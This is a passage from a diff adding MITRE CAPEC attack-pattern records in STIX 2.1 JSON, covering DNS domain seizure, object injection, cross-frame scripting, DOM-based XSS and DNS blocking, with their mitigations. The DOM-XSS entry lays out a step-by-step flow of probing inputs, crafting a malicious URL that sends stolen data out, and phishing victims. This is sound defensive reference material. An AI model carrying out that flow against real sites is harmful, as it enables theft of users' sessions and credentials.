"course-of-action--1c733d77-23ad-4455-b854-996ea0d64125", + "spec_version": "2.1", + "target_ref": "attack-pattern--eb0ebb0b-d4e1-4480-87a8-043d6f93c972", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary influences a target's web-hosting company to disable a target domain. The goal is to prevent access to the targeted service provided by that domain. It usually occurs as the result of civil or criminal legal interventions.", + "external_references": [ + { + "external_id": "CAPEC-585", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/585.html" + }, + { + "description": "Dozens of Online 'Dark Markets' Seized Pursuant to Forfeiture Complaint Filed in Manhattan Federal Court in Conjunction with the Arrest of the Operator of Silk Road 2.0, 2014, FBI", + "external_id": "REF-467", + "source_name": "reference_from_CAPEC", + "url": "https://www.fbi.gov/contact-us/field-offices/newyork/news/press-releases/dozens-of-online-dark-markets-seized-pursuant-to-forfeiture-complaint-filed-in-manhattan-federal-court-in-conjunction-with-the-arrest-of-the-operator-of-silk-road-2.0" + } + ], + "id": "attack-pattern--3cedbb3a-e97f-4bc7-ac36-2c1f0c360d08", + "modified": "2023-01-24T00:00:00.000Z", + "name": "DNS Domain Seizure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--795c323b-cae6-4846-99f1-dad3fe0ab8e8" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Disabling a target domain at the infrastructure level denies the availability of its service to the user.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The FBI's seizure of gambling websites, the US DOJ's seizure of child pornography websites, and Microsoft's seizure of all domains owned by the company No-IP in order to disrupt a cyberattack originating from a subset of those domains." + ], + "x_capec_prerequisites": [ + "This attack pattern requires that the adversary has cooperation from the registrar of the target domain." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.", + "external_references": [ + { + "external_id": "CAPEC-586", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/586.html" + }, + { + "external_id": "CWE-502", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/502.html" + }, + { + "description": "Deserialization of Untrusted Data, 2017--01, OWASP", + "external_id": "REF-468", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Object Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands (Functions that assume information in the deserialized object is valid could be exploited.)" + ], + "Availability": [ + "Resource Consumption (If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate and exhaust available resources.)" + ], + "Integrity": [ + "Modify Data (Attackers can modify objects or data that was assumed to be safe from modification.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must unserialize data before validation." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Validate object before deserialization process\n ", + "id": "course-of-action--d3dc78e4-1172-4e81-87c5-6634276605ca", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--50611ddc-8881-4263-bab2-125e6dffc2dd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d3dc78e4-1172-4e81-87c5-6634276605ca", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Design: Limit which types can be deserialized.\n ", + "id": "course-of-action--e63f8da1-f215-492e-82d4-08bf836643b5", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c5e70b1-a550-4e28-b4d8-d9530d4fab32", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e63f8da1-f215-492e-82d4-08bf836643b5", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. Use an allowlist of acceptable classes.\n ", + "id": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--be57abfe-85d5-4551-999f-0b9a7599d222", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe359dd0-2a15-4f6c-8fcf-6a073cf2d158", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Implementation: Keep session state on the server, when possible.\n ", + "id": "course-of-action--acbc51fe-6e63-467b-9f6c-4251ff581eee", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-586-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e21732f4-8d62-489d-a0d9-028bc964377b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--acbc51fe-6e63-467b-9f6c-4251ff581eee", + "spec_version": "2.1", + "target_ref": "attack-pattern--5e767629-8d94-46f3-a277-741d163bff95", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern combines malicious Javascript and a legitimate webpage loaded into a concealed iframe. The malicious Javascript is then able to interact with a legitimate webpage in a manner that is unknown to the user. This attack usually leverages some element of social engineering in that an attacker must convinces a user to visit a web page that the attacker controls.", + "external_references": [ + { + "external_id": "CAPEC-587", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/587.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Cross Frame Scripting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Frame_Scripting" + }, + { + "description": "Cross Frame Scripting, 2016, OWASP", + "external_id": "REF-469", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Cross_Frame_Scripting" + }, + { + "description": "Gustave Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson, Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites, 2010--07---20", + "external_id": "REF-470", + "source_name": "reference_from_CAPEC", + "url": "https://seclab.stanford.edu/websec/framebusting/framebust.pdf" + } + ], + "id": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Cross Frame Scripting (XFS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Cross Frame Scripting allows an adversary to steal sensitive data from a legitimate site.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "An adversary-controlled webpage contains malicious Javascript and a concealed iframe containing a legitimate website login (i.e., the concealed iframe would make it appear as though the actual legitimate website was loaded). When the user interacts with the legitimate website in the iframe, the malicious Javascript collects that sensitive information." + ], + "x_capec_prerequisites": [ + "The user's browser must have vulnerabilities in its implementation of the same-origin policy. It allows certain data in a loaded page to originate from different servers/domains." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid clicking on untrusted links.", + "id": "course-of-action--56d38673-9752-418f-9de4-189f1a3b3e9e", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-587-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d3562cf5-2484-4ed5-97e3-8da8f0bf5ea7", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--56d38673-9752-418f-9de4-189f1a3b3e9e", + "spec_version": "2.1", + "target_ref": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ techniques such as frame busting, which is a method by which developers aim to prevent their site being loaded within a frame.", + "id": "course-of-action--8ce90bd8-35f9-463c-80c0-9649c43ca63b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-587-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--de5b8ee3-b664-4dc0-8e2e-e49c5c3df549", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ce90bd8-35f9-463c-80c0-9649c43ca63b", + "spec_version": "2.1", + "target_ref": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is inserted into the client-side HTML being parsed by a web browser. Content served by a vulnerable web application includes script code used to manipulate the Document Object Model (DOM). This script code either does not properly validate input, or does not perform proper output encoding, thus creating an opportunity for an adversary to inject a malicious script launch a XSS attack. A key distinction between other XSS attacks and DOM-based attacks is that in other XSS attacks, the malicious script runs when the vulnerable web page is initially loaded, while a DOM-based attack executes sometime after the page loads. Another distinction of DOM-based attacks is that in some cases, the malicious script is never sent to the vulnerable web server at all. An attack like this is guaranteed to bypass any server-side filtering attempts to protect users.", + "external_references": [ + { + "external_id": "CAPEC-588", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/588.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-83", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/83.html" + }, + { + "description": "Reflected DOM Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Reflected_DOM_Injection" + }, + { + "description": "Amit Klein, DOM Based Cross Site Scripting or XSS of the Third Kind", + "external_id": "REF-471", + "source_name": "reference_from_CAPEC", + "url": "http://www.webappsec.org/projects/articles/071105.shtml" + }, + { + "description": "Jakob Kallin, Irene Lobo Valbuena, A comprehensive tutorial on cross-site scripting", + "external_id": "REF-472", + "source_name": "reference_from_CAPEC", + "url": "https://excess-xss.com/" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-618", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.html" + } + ], + "id": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DOM-Based XSS", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Authorization": [ + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)" + ], + "Availability": [ + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Confidentiality": [ + "Read Data (A successful DOM-based XSS attack can enable an adversary to exfiltrate sensitive information from the application.)", + "Gain Privileges (A successful DOM-based XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)", + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (A successful DOM-based XSS attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)", + "Modify Data (A successful DOM-based XSS attack can allow an adversary to tamper with application data.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.\n http://my.site.com/aform.html?mode=full\n The application’s client-side code may want to print this mode value to the screen to give the users an understanding of what mode they are in. In this example, JavaScript is used to pull the value from the URL and update the HTML by dynamically manipulating the DOM via a document.write() call.\n \n Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim’s browser:\n http://my.site.com/aform.html?mode=\n ", + "\n In some DOM-based attacks, the malicious script never gets sent to the web server at all, thus bypassing any server-side protections that might be in place. Consider the previously used web application that displays the mode value. Since the HTML is being generated dynamically through DOM manipulations, a URL fragment (i.e., the part of a URL after the '#' character) can be used.\n http://my.site.com/aform.html#mode=\n In this variation of a DOM-based XSS attack, the malicious script will not be sent to the web server, but will instead be managed by the victim's browser and is still available to the client-side script code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for DOM-based XSS vulnerability: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. Specific to DOM-based XSS, the adversary is looking for areas where input is being used to directly change the DOM.

    2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they were properly encoded, replaced, or filtered out.

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim. In DOM-based XSS, the malicious script might not even be sent to the server, since the victim's browser will manipulate the DOM itself. This can help avoid serve-side detection mechanisms.

    3. Techniques
    Change a URL parameter to include a malicious script tag.
    Add a URL fragment to alter the value of the expected Document object URL.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--89697649-1004-4130-a9dd-72182e4c6206", + "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "attack-pattern--eade303a-1d70-4095-96da-5cf1d9f4333f", + "attack-pattern--c77ec906-0371-482e-8b14-a4a41b6b5b74", + "attack-pattern--66b042e0-f88f-4aa5-9d87-1e71a4b3dcd8", + "attack-pattern--52b5f7dc-228b-44d5-865a-e4595b227ba2", + "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b", + "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e" + ], + "x_capec_prerequisites": [ + "An application that leverages a client-side web browser with scripting enabled.", + "An application that manipulates the DOM via client-side scripting.", + "An application that failS to adequately sanitize or encode untrusted input." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Requires the ability to write scripts of some complexity and to inject it through user controlled fields in the system." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use browser technologies that do not allow client-side scripting.", + "id": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--279f0698-c251-4497-8cf6-8dd35638757e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7dc1cd16-6e36-4b01-bee9-f089fc544d5a", + "spec_version": "2.1", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize proper character encoding for all output produced within client-site scripts manipulating the DOM.", + "id": "course-of-action--581c316a-7f9b-45f5-bb4d-b096f6162dab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6f81714-a1aa-46d0-ad1e-fdbfa6e5814e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--581c316a-7f9b-45f5-bb4d-b096f6162dab", + "spec_version": "2.1", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all user-supplied input is validated before use.", + "id": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-588-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--19dedc30-dbcc-4fd6-bad2-bade72cef5d9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e2e8032-4e25-4013-b914-eb89f14df01f", + "spec_version": "2.1", + "target_ref": "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary intercepts traffic and intentionally drops DNS requests based on content in the request. In this way, the adversary can deny the availability of specific services or content to the user even if the IP address is changed.", + "external_references": [ + { + "external_id": "CAPEC-589", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/589.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "description": "Censorship in the Wild: Analyzing Internet Filtering in Syria, 2014, Sigcomm", + "external_id": "REF-473", + "source_name": "reference_from_CAPEC", + "url": "http://conferences2.sigcomm.org/imc/2014/papers/p285.pdf" + } + ], + "id": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "modified": "2020-12-17T00:00:00.000Z", + "name": "DNS Blocking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec0de204-6b66-4c4f-a401-21afa72f3941" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Preventing DNS from resolving a request denies the availability of a target site or service for the user.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n Full URL Based Filtering: Filtering based upon the requested URL.\n URL String-based Filtering: Filtering based upon the use of particular strings included in the requested URL.\n " + ], + "x_capec_prerequisites": [ + "This attack requires the ability to conduct deep packet inspection with an In-Path device that can drop the targeted traffic and/or connection." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hard Coded Alternate DNS server in applications", + "id": "course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--428bf1f5-901f-40d8-aeb9-ab5da829f74e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb9140e4-e1c4-4b8c-9b1b-f14f81b478f8", + "spec_version": "2.1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid dependence on DNS", + "id": "course-of-action--7e0432d6-34d5-4694-a138-b9561cac5a25", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2679eb47-74ab-4dab-8fa0-80041226d78e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e0432d6-34d5-4694-a138-b9561cac5a25", + "spec_version": "2.1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Include \"hosts file\"/IP address in the application.", + "id": "course-of-action--e4470b31-8c3a-47da-a2b2-1fdf946e88f1", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0f64c49e-d265-4f33-afbc-5434b791104b", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e4470b31-8c3a-47da-a2b2-1fdf946e88f1", + "spec_version": "2.1", + "target_ref": "attack-pattern--5a002211-15f2-487f-8a5d-b09150ac1138", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure best practices with respect to communications channel protections.", + "id": "course-of-action--278ea0bd-2f3e-44e3-8398-566da0f8b0a1", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-589-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": 